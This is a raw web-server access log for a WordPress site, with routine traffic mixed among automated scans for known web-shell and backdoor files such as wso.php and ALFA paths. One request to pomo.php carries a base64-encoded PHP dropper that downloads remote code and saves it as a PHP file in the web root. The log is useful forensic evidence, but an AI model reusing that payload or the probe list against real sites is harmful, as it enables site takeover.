217.142.191.67 - - [01/Apr/2025:07:12:14 -0400] "GET //tempfuns.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:17 -0400] "GET /tempfuns.php HTTP/1.1" 404 9421 "http://the80itspod.com//tempfuns.php" "Go-http-client/1.1"
198.54.114.83 - - [01/Apr/2025:07:12:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743505939.2675530910491943359375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
217.142.191.67 - - [01/Apr/2025:07:12:18 -0400] "GET //adminfuns.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:20 -0400] "GET /adminfuns.php HTTP/1.1" 404 9421 "http://the80itspod.com//adminfuns.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:21 -0400] "GET //nf_tracking.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:23 -0400] "GET /nf_tracking.php HTTP/1.1" 404 9421 "http://the80itspod.com//nf_tracking.php#password" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:25 -0400] "GET //wp-content/wso.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:26 -0400] "GET /wp-content/wso.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-content/wso.php#UEjlZcWL%23UEjlZcWL" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:28 -0400] "GET //wp-includes/wso.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:31 -0400] "GET /wp-includes/wso.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-includes/wso.php#UEjlZcWL%23UEjlZcWL" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:34 -0400] "GET //wso.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:36 -0400] "GET /wso.php HTTP/1.1" 404 9421 "http://the80itspod.com//wso.php#UEjlZcWL" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:38 -0400] "GET //wp-content/uploads/wp-apxupx.php?apx=upx HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:39 -0400] "GET /wp-content/uploads/wp-apxupx.php?apx=upx HTTP/1.1" 404 9428 "http://the80itspod.com//wp-content/uploads/wp-apxupx.php?apx=upx" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:40 -0400] "GET //wp-content/upgrade/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:42 -0400] "GET /wp-content/upgrade/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-content/upgrade/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:43 -0400] "GET //cgi-bin/sgd.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:44 -0400] "GET /cgi-bin/sgd.php HTTP/1.1" 404 9421 "http://the80itspod.com//cgi-bin/sgd.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:47 -0400] "GET //wp-admin/js/widgets/sgd.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:48 -0400] "GET /wp-admin/js/widgets/sgd.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-admin/js/widgets/sgd.php#fg123" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:50 -0400] "GET //wp-apxupx.php?apx=upx HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:51 -0400] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 404 9421 "http://the80itspod.com//wp-apxupx.php?apx=upx" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:53 -0400] "GET //wp-includes/IXR/class.api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:54 -0400] "GET /wp-includes/IXR/class.api.php HTTP/1.1" 404 9428 "http://the80itspod.com//wp-includes/IXR/class.api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:55 -0400] "GET //wp-content/languages/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:56 -0400] "GET /wp-content/languages/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-content/languages/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:58 -0400] "GET //class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:59 -0400] "GET /class_api.php HTTP/1.1" 404 9427 "http://the80itspod.com//class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:12:59 -0400] "GET //.well-known/acme-challenge/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:00 -0400] "GET /.well-known/acme-challenge/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//.well-known/acme-challenge/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:02 -0400] "GET //.tmb/mariju.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:04 -0400] "GET /.tmb/mariju.php HTTP/1.1" 404 9428 "http://the80itspod.com//.tmb/mariju.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:07 -0400] "GET //wp-content/languages/themes/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:08 -0400] "GET /wp-content/languages/themes/class_api.php HTTP/1.1" 404 9428 "http://the80itspod.com//wp-content/languages/themes/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:09 -0400] "GET //wp-admin/includes/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:10 -0400] "GET /wp-admin/includes/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-admin/includes/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:12 -0400] "GET //wp-admin/js/widgets/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:13 -0400] "GET /wp-admin/js/widgets/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-admin/js/widgets/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:16 -0400] "GET //wp-admin/network/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
198.54.114.83 - - [01/Apr/2025:07:13:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743505998.4792790412902832031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
217.142.191.67 - - [01/Apr/2025:07:13:17 -0400] "GET /wp-admin/network/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-admin/network/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:19 -0400] "GET //.tmb/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:20 -0400] "GET /.tmb/class_api.php HTTP/1.1" 404 9428 "http://the80itspod.com//.tmb/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:21 -0400] "GET //assets/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:22 -0400] "GET /assets/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//assets/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:23 -0400] "GET //common/css/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:24 -0400] "GET /common/css/class_api.php HTTP/1.1" 404 9428 "http://the80itspod.com//common/css/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:25 -0400] "GET //common/img/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:26 -0400] "GET /common/img/class_api.php HTTP/1.1" 404 9428 "http://the80itspod.com//common/img/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:27 -0400] "GET //.well-known/acme-challenge/mariju.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:28 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 404 9421 "http://the80itspod.com//.well-known/acme-challenge/mariju.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:29 -0400] "GET //wp-admin/user/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:30 -0400] "GET /wp-admin/user/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-admin/user/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:32 -0400] "GET //wp-includes/rest-api/fields/cache/index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:33 -0400] "GET /wp-includes/rest-api/fields/cache/ HTTP/1.1" 404 9428 "http://the80itspod.com//wp-includes/rest-api/fields/cache/index.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:34 -0400] "GET //wp-content/themes/travel/issue.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:35 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 9428 "http://the80itspod.com//wp-content/themes/travel/issue.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:36 -0400] "GET //wp-includes/IXR/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:37 -0400] "GET /wp-includes/IXR/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-includes/IXR/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:38 -0400] "GET //wp-includes/Requests/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:40 -0400] "GET /wp-includes/Requests/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-includes/Requests/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:41 -0400] "GET //wp-includes/random_compat/class_api.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:42 -0400] "GET /wp-includes/random_compat/class_api.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-includes/random_compat/class_api.php" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:44 -0400] "GET //wp-content/themes/hello-element/footer.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
217.142.191.67 - - [01/Apr/2025:07:13:45 -0400] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 404 9421 "http://the80itspod.com//wp-content/themes/hello-element/footer.php" "Go-http-client/1.1"
216.244.66.235 - - [01/Apr/2025:07:26:17 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:07:29:25 -0400] "POST /wp-cron.php?doing_wp_cron=1743506964.8333990573883056640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
216.244.66.235 - - [01/Apr/2025:07:29:24 -0400] "GET /common-customer-complaints-8-examples-and/ HTTP/1.1" 200 92276 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
43.153.104.196 - - [01/Apr/2025:07:53:16 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:07:54:03 -0400] "POST /wp-cron.php?doing_wp_cron=1743508442.9779179096221923828125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
167.99.57.60 - - [01/Apr/2025:07:53:57 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
196.251.80.22 - - [01/Apr/2025:09:00:05 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:04 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 403 7163 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:04 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 403 7163 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:09 -0400] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:04 -0400] "POST /wp-plain.php HTTP/1.1" 200 0 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:05 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:12 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 403 7163 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:09:00:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743512411.2679800987243652343750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
196.251.80.22 - - [01/Apr/2025:09:00:13 -0400] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:13 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:17 -0400] "GET /wp-content/plugins/apikey/apikey.php.suspected?test=hello HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [01/Apr/2025:09:00:20 -0400] "GET /plugins/content/apismtp/apismtp.php.suspected?test=hello HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
165.227.188.67 - - [01/Apr/2025:09:56:58 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
194.5.53.182 - - [01/Apr/2025:10:05:04 -0400] "GET / HTTP/1.1" 200 16759 "-" "Python/3.11 aiohttp/3.11.11"
85.208.98.23 - - [01/Apr/2025:10:22:06 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:10:29:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743517779.2834439277648925781250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
91.148.239.130 - - [01/Apr/2025:10:29:37 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/assets/bootstrap/css/bootstrap.min.css?ver=6.7.2 HTTP/1.1" 200 25140 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.2 HTTP/1.1" 200 19532 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/assets/icons/style.css?ver=6.7.2 HTTP/1.1" 200 1353 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/newsback/style.css?ver=1.0.2 HTTP/1.1" 200 2440 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 35438 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/style.css?ver=6.7.2 HTTP/1.1" 200 48609 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/assets/jquery-match-height/jquery.matchHeight.min.js?ver=1.0.2 HTTP/1.1" 200 1470 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/js/skip-link-focus-fix.js?ver=1.0.2 HTTP/1.1" 200 426 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 5342 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:42 -0400] "GET /wp-content/themes/covernews/js/navigation.js?ver=1.0.2 HTTP/1.1" 200 1179 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:43 -0400] "GET /wp-content/themes/covernews/assets/fixed-header-script.js?ver=1.0.2 HTTP/1.1" 200 868 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:43 -0400] "GET /wp-content/themes/covernews/assets/script.js?ver=1.0.2 HTTP/1.1" 200 3529 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
20.191.45.212 - - [01/Apr/2025:10:42:17 -0400] "GET / HTTP/1.1" 200 16759 "http://the80itspod.com/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
20.191.45.212 - - [01/Apr/2025:10:42:17 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://the80itspod.com/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
91.148.239.130 - - [01/Apr/2025:10:48:37 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:38 -0400] "GET /wp-content/themes/covernews/assets/script.js?ver=1.0.2 HTTP/1.1" 200 3529 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:38 -0400] "GET /wp-content/themes/covernews/assets/icons/fonts/aft-icons.ttf?kiv2u2 HTTP/1.1" 200 19272 "http://the80itspod.com/wp-content/themes/covernews/assets/icons/style.css?ver=6.7.2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:39 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.2 HTTP/1.1" 200 5857 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:38 -0400] "GET /wp-content/themes/newsback/assets/img/default-header-image.jpeg HTTP/1.1" 200 297284 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:40 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://the80itspod.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
114.96.103.33 - - [01/Apr/2025:11:00:04 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:11:20:33 -0400] "POST /wp-cron.php?doing_wp_cron=1743520832.3713500499725341796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
91.148.239.130 - - [01/Apr/2025:11:20:27 -0400] "GET /wp-includes/pomo/pomo.php?log=sanane&act=upload&file=wordpress.php&data=PD9waHAKaWYgKGlzc2V0KCRfR0VUWyd1J10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3UnXTsKICAgIGlmIChmaWx0ZXJfdmFyKCR1cmwsIEZJTFRFUl9WQUxJREFURV9VUkwpKSB7CiAgICAgICAgJGZpbGVDb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICAgICAgaWYgKCRmaWxlQ29udGVudCAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJGZpbGVOYW1lID0gYmFzZW5hbWUocGFyc2VfdXJsKCR1cmwsIFBIUF9VUkxfUEFUSCkpOwogICAgICAgICAgICAkZmlsZU5hbWVXaXRob3V0RXh0ID0gcGF0aGluZm8oJGZpbGVOYW1lLCBQQVRISU5GT19GSUxFTkFNRSk7CiAgICAgICAgICAgICRuZXdGaWxlTmFtZSA9ICRmaWxlTmFtZVdpdGhvdXRFeHQgLiAnLnBocCc7CiAgICAgICAgICAgICRzYXZlUGF0aCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAnLycgLiAkbmV3RmlsZU5hbWU7CiAgICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRzYXZlUGF0aCwgJGZpbGVDb250ZW50KTsKICAgICAgICAgICAgZWNobyAiRG9zeWEga2F5ZGVkaWxkaTogIiAuICRuZXdGaWxlTmFtZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEb3N5YSBpw6dlcmnEn2kgYWzEsW5hbWFkxLEuIjsKICAgICAgICB9CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkdlw6dlcnNpeiBVUkwuIjsKICAgIH0KfSBlbHNlIHsKICAgIGVjaG8gIlVSTCBiZWxpcnRpbG1lZGkuIjsKfQo/Pgo= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
196.251.88.242 - - [01/Apr/2025:12:19:51 -0400] "GET /geju.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [01/Apr/2025:12:20:01 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [01/Apr/2025:12:20:11 -0400] "GET /wp.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.178.226.40 - - [01/Apr/2025:12:39:52 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:12:47:36 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
172.200.254.137 - - [01/Apr/2025:13:01:16 -0400] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:17 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:01:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743526878.2567279338836669921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
